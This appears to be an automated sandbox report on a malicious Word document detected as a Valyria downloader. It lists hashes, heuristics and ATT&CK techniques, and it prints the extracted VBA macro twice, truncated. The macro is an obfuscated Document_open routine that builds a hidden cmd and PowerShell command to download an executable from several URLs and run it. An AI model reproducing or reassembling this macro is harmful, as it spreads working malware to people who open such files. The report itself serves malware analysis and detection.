Office (OLE) malware analysis — malicious · 567162c15a1ca6f0

MALICIOUS

Office (OLE)

64.8 KB Created: 2018-09-07 14:40:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 1c9806173967c44ba35012cdcb52eba0 SHA-1: 599d079c03883e97460782d39e8d1f28102f1a87 SHA-256: 567162c15a1ca6f05c75779dbddc183c43cab6c917ff86a0fbeec2dfce3faab1

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, which is used within the Document_open macro to execute a command. The script attempts to construct and execute a command string, likely for downloading and running a secondary payload. The specific command constructed is obfuscated, but the intent is clear.

Heuristics 5

ClamAV: Doc.Downloader.Valyria-6922866-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Valyria-6922866-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6567 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	6567 bytes
SHA-256: `27ee2830112938b3e1a17bdd0b637cc19311dcb72ecf7bb7b0c01444ce604732`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "jjqAcCsVzOQ" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() On _ Error _ Resume _ Next Month CStr("8963" + "Clfi" + "80" + "wT") Month CStr("3505" + "6218" + "zYdSBzMt" + "LOOI") Month CStr("rBilkf" + "KBzLLRZvh") Month CStr("z" + "s" + "vZl" + "JNvX") Month CStr("t" + "9552" + "kI" + "CblR") Month CStr("246654939" + "162023883") Shell CStr(XTzFkzTaQF) + CStr(YSInciNiUI) + nqzkoaD + puAaMFVD + MwtEZIBhiND + CStr(wznREhFFbnsIm) + CStr(OvEPizMUNKPNdK), CStr(vbHide) Month CStr("vkdZGp" + "cv" + "5660" + "504240444") Month CStr("Fz" + "fkZRPajvSdrAZ" + "402395061" + "cWW") Month CStr("2505" + "94812061") End Sub Attribute VB_Name = "nIrnOpdpo" Function nqzkoaD() On _ Error _ Resume _ Next Month CStr("Aj" + "54807151") qOVOlTzIR = Chr(17 + 5 + 12 + 13 + 52) + "md" + " /V/" + Chr(11 + 3 + 8 + 9 + 36) + Chr(5 + 1 + 3 + 4 + 21) + "^se^" + "t I^O^b" + "=^ ^ " + "^ ^ " + " " + "^ " + "^ ^ ^" Month CStr("N" + "H") Month CStr("ELI" + "3009" + "vjPKvzlstjn" + "Lq") JjNRBZfUQQT = " ^ " + "}}" + "{^h" + Chr(17 + 5 + 12 + 13 + 52) + "^" + "ta" + Chr(17 + 5 + 12 + 13 + 52) + "^};k" + "a^" + "er^b" + ";I" Month CStr("E" + "pp" + "sjtK" + "T") Month CStr("Ha" + "8674") csIiUiY = "S" + "w^$" + "^ m^e^" + "t^I^-" + "^e^kovn" + "^I" + ";)I" + "S^w" + "^$ ^," + "^j^T^W" + "$(^e^l^" + "iF" Month CStr("505645656" + "9947" + "4981" + "mDY") Month CStr("3245" + "1092" + "138671089" + "350050640") Month CStr("95133085" + "8965") Month CStr("M" + "N" + "ADSvCrfQlz" + "9394") Month CStr("95195421" + "mXD") NEcBta = "^dao^l" + "n" + "wo^D." + "^SN" + "u${yrt^" + "{)^p" + "TM^$^" + " ni j^" + "T" + "W$" Month CStr("2376" + "cMHqbTWid" + "Ih" + "479946264") woDbI = "(" + "h" + Chr(17 + 5 + 12 + 13 + 52) + "aer" + "^o^f;^" + "'^e^x^e" + "^.^'" + "+^z^D" + "a^$" + "^+'" + "\'+" + Chr(17 + 5 + 12 + 13 + 52) Month CStr("8873" + "6002" + "448641095" + "FInRTiHWm") Month CStr("L" + "JBr" + "4896" + "V") Month CStr("vXHp" + "188594286" + "OwFvrjLliqDWn" + "Ow") Month CStr("5816" + "j" + "bkjcKQ" + "XvNkNFD") Month CStr("RPYw" + "oWtkB" + "420247437" + "oY") cUaujUPqFAi = "^i^" + "lb^" + "u^" + "p^:v" + "ne^$^" Month CStr("ak" + "232908972" + "s" + "20714442") Month CStr("u" + "Jrji" + "Rduw" + "nfH") bzGEwzd = "=^I^S^" + "w^" + "$;'" + "9^3^2" + "'" Month CStr("lff" + "znMCjZlvC") Month CStr("8264" + "408298511" + "3686" + "b") YlzhZQzjWk = " ^= " + "^" + "zDa$^;)" + "'^@" + "^" + "'" + "(ti" + "lp^S" + "." Month CStr("332659622" + "VZK") MjjNKo = "'f" + "TL^" + "j89W" + "k/^ln^" + ".e" + "l^ba" + Chr(17 + 5 + 12 + 13 + 52) + "re" + "si" + "r/" + "/^:^p^" + "tth@^4P" + "F^S^2" + "t0^0^" + "4" nqzkoaD = qOVOlTzIR + JjNRBZfUQQT + csIiUiY + NEcBta + woDbI + cUaujUPqFAi + bzGEwzd + YlzhZQzjWk + MjjNKo Month CStr("rcpu" + "15619119") Month CStr("7574" + "7465" + "2313" + "302756700") Month CStr("Tt" + "jnU" + "s" + "1111") Month CStr("6975" + "XIQDHjm" + "zwZacbrdfipiZd" + "6794") Month CStr("6561" + "301349976") End Function Function puAaMFVD() On _ Error _ Resume _ Next Month CStr("6054" + "zkNXCK") Month CStr("103129436" + "Ur" + "lYiXaliFBEOzH" + "kN") Month CStr("nHiZXCn" + "507228431") Month CStr("jjNSaIomEJr" + "A") iiWuW = "o/" + "^e^" + "p.s^l" + "^a^tiyi" + "d//^:" Month CStr("jVGh" + "VXvm") ABiRaNotYN = "p^tt^" + "h" + "^@K^H" + "k^S^S6" + "^Y" + "/^mo" + Chr(17 + 5 + 12 + 13 + 52) + ".^" + "a^u^h" + "^jn^" + "a" + "uy" Month CStr("2862" + "XkFls") Month CStr("1641" + "2262" + "jdFIUAbWohUw" + "8991") Month CStr("393151650" + "q") Month CStr("Drn" + "4088") Month CStr("5982" + "KOZjvX" + "8100567" + "4682") QCdlXVTvwc = ".w" + "w^w//^" + ":p^tth@" + Chr(11 + 3 + 8 + 9 + 36) + "V" + "^m" + "w^" + "O" + "^0^Z/m" + "^o" + ... (truncated)

SHA-256: 27ee2830112938b3e1a17bdd0b637cc19311dcb72ecf7bb7b0c01444ce604732

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "jjqAcCsVzOQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Month CStr("8963" + "Clfi" + "80" + "wT")
   Month CStr("3505" + "6218" + "zYdSBzMt" + "LOOI")
   Month CStr("rBilkf" + "KBzLLRZvh")
   Month CStr("z" + "s" + "vZl" + "JNvX")
   Month CStr("t" + "9552" + "kI" + "CblR")
   Month CStr("246654939" + "162023883")
Shell CStr(XTzFkzTaQF) + CStr(YSInciNiUI) + nqzkoaD + puAaMFVD + MwtEZIBhiND + CStr(wznREhFFbnsIm) + CStr(OvEPizMUNKPNdK), CStr(vbHide)
   Month CStr("vkdZGp" + "cv" + "5660" + "504240444")
   Month CStr("Fz" + "fkZRPajvSdrAZ" + "402395061" + "cWW")
   Month CStr("2505" + "94812061")
End Sub



Attribute VB_Name = "nIrnOpdpo"
Function nqzkoaD()

On _
Error _
Resume _
Next
Month CStr("Aj" + "54807151")
qOVOlTzIR = Chr(17 + 5 + 12 + 13 + 52) + "md" + " /V/" + Chr(11 + 3 + 8 + 9 + 36) + Chr(5 + 1 + 3 + 4 + 21) + "^se^" + "t I^O^b" + "=^ ^  " + "^ ^  " + "   " + "^ " + "^   ^ ^"
Month CStr("N" + "H")
   Month CStr("ELI" + "3009" + "vjPKvzlstjn" + "Lq")
JjNRBZfUQQT = " ^  " + "}}" + "{^h" + Chr(17 + 5 + 12 + 13 + 52) + "^" + "ta" + Chr(17 + 5 + 12 + 13 + 52) + "^};k" + "a^" + "er^b" + ";I"
Month CStr("E" + "pp" + "sjtK" + "T")
   Month CStr("Ha" + "8674")
csIiUiY = "S" + "w^$" + "^ m^e^" + "t^I^-" + "^e^kovn" + "^I" + ";)I" + "S^w" + "^$ ^," + "^j^T^W" + "$(^e^l^" + "iF"
Month CStr("505645656" + "9947" + "4981" + "mDY")
   Month CStr("3245" + "1092" + "138671089" + "350050640")
   Month CStr("95133085" + "8965")
   Month CStr("M" + "N" + "ADSvCrfQlz" + "9394")
   Month CStr("95195421" + "mXD")
NEcBta = "^dao^l" + "n" + "wo^D." + "^SN" + "u${yrt^" + "{)^p" + "TM^$^" + " ni j^" + "T" + "W$"
Month CStr("2376" + "cMHqbTWid" + "Ih" + "479946264")
woDbI = "(" + "h" + Chr(17 + 5 + 12 + 13 + 52) + "aer" + "^o^f;^" + "'^e^x^e" + "^.^'" + "+^z^D" + "a^$" + "^+'" + "\'+" + Chr(17 + 5 + 12 + 13 + 52)
Month CStr("8873" + "6002" + "448641095" + "FInRTiHWm")
   Month CStr("L" + "JBr" + "4896" + "V")
   Month CStr("vXHp" + "188594286" + "OwFvrjLliqDWn" + "Ow")
   Month CStr("5816" + "j" + "bkjcKQ" + "XvNkNFD")
   Month CStr("RPYw" + "oWtkB" + "420247437" + "oY")
cUaujUPqFAi = "^i^" + "lb^" + "u^" + "p^:v" + "ne^$^"
Month CStr("ak" + "232908972" + "s" + "20714442")
   Month CStr("u" + "Jrji" + "Rduw" + "nfH")
bzGEwzd = "=^I^S^" + "w^" + "$;'" + "9^3^2" + "'"
Month CStr("lff" + "znMCjZlvC")
   Month CStr("8264" + "408298511" + "3686" + "b")
YlzhZQzjWk = " ^= " + "^" + "zDa$^;)" + "'^@" + "^" + "'" + "(ti" + "lp^S" + "."
Month CStr("332659622" + "VZK")
MjjNKo = "'f" + "TL^" + "j89W" + "k/^ln^" + ".e" + "l^ba" + Chr(17 + 5 + 12 + 13 + 52) + "re" + "si" + "r/" + "/^:^p^" + "tth@^4P" + "F^S^2" + "t0^0^" + "4"
nqzkoaD = qOVOlTzIR + JjNRBZfUQQT + csIiUiY + NEcBta + woDbI + cUaujUPqFAi + bzGEwzd + YlzhZQzjWk + MjjNKo
   Month CStr("rcpu" + "15619119")
   Month CStr("7574" + "7465" + "2313" + "302756700")
   Month CStr("Tt" + "jnU" + "s" + "1111")
   Month CStr("6975" + "XIQDHjm" + "zwZacbrdfipiZd" + "6794")
   Month CStr("6561" + "301349976")
End Function
Function puAaMFVD()

On _
Error _
Resume _
Next
Month CStr("6054" + "zkNXCK")
   Month CStr("103129436" + "Ur" + "lYiXaliFBEOzH" + "kN")
   Month CStr("nHiZXCn" + "507228431")
   Month CStr("jjNSaIomEJr" + "A")
iiWuW = "o/" + "^e^" + "p.s^l" + "^a^tiyi" + "d//^:"
Month CStr("jVGh" + "VXvm")
ABiRaNotYN = "p^tt^" + "h" + "^@K^H" + "k^S^S6" + "^Y" + "/^mo" + Chr(17 + 5 + 12 + 13 + 52) + ".^" + "a^u^h" + "^jn^" + "a" + "uy"
Month CStr("2862" + "XkFls")
   Month CStr("1641" + "2262" + "jdFIUAbWohUw" + "8991")
   Month CStr("393151650" + "q")
   Month CStr("Drn" + "4088")
   Month CStr("5982" + "KOZjvX" + "8100567" + "4682")
QCdlXVTvwc = ".w" + "w^w//^" + ":p^tth@" + Chr(11 + 3 + 8 + 9 + 36) + "V" + "^m" + "w^" + "O" + "^0^Z/m" + "^o" +
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.